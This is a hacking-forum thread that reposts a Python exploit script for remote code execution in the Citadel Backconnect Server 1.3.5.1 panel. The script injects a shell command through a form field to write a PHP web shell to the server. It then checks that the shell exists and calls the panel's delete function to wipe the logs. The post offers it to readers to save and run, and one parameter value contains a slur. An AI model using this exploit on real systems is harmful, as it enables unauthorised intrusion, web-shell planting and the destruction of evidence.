![]() |
|
Citadel Backconnect Server 1.3.5.1 Remote Code Execution - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Hacking (https://sinister.li/Forum-Hacking) +--- Forum: Remote Administration & Stress Testing (https://sinister.li/Forum-Remote-Administration-Stress-Testing) +--- Thread: Citadel Backconnect Server 1.3.5.1 Remote Code Execution (/Thread-Citadel-Backconnect-Server-1-3-5-1-Remote-Code-Execution) |
Citadel Backconnect Server 1.3.5.1 Remote Code Execution - joeroot - 07-10-2014 Citadel Backconnect Server 1.3.5.1 Remote Code Execution 2014 save and run exp_ctd.py PHP Code: import urllib
import urllib2
# Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability
# Work only on windows box
def request(url, params=None, method='GET'):
if method == 'POST':
urllib2.urlopen(url, urllib.urlencode(params)).read()
elif method == 'GET':
if params == None:
urllib2.urlopen(url)
else:
urllib2.urlopen(url + '?' + urllib.urlencode(params)).read()
def uploadShell(url, filename, payload):
data = {
'b' : 'tapz',
'p1' : 'faggot',
'p2' : 'hacker | echo "' + payload + '" >> ' + filename
}
request(url + 'test.php', data)
def shellExists(url):
return urllib.urlopen(url).getcode() == 200
def cleanLogs(url):
delete = {
'delete' : ''
}
request(URL + 'control.php', delete, 'POST')
URL = 'http://localhost/citadel/winserv_php_gate/'
FILENAME = 'shell.php'
PAYLOAD = '<?php phpinfo(); ?>'
uploadShell(URL, FILENAME, PAYLOAD)
print '***91;~***93; Shell created!'
if not shellExists(URL + FILENAME):
print '***91;-***93;', FILENAME, 'not found...'
else:
print '***91;+***93; Go to:', URL + FILENAME
cleanLogs(URL)
print '***91;~***93; Logs cleaned!'
# 9111FFA1CB560CBD 1337day.com ***91;2014-01-02***93; 43A115C3EB64CD0D #
source:- http://1337day.com/exploit/21720
|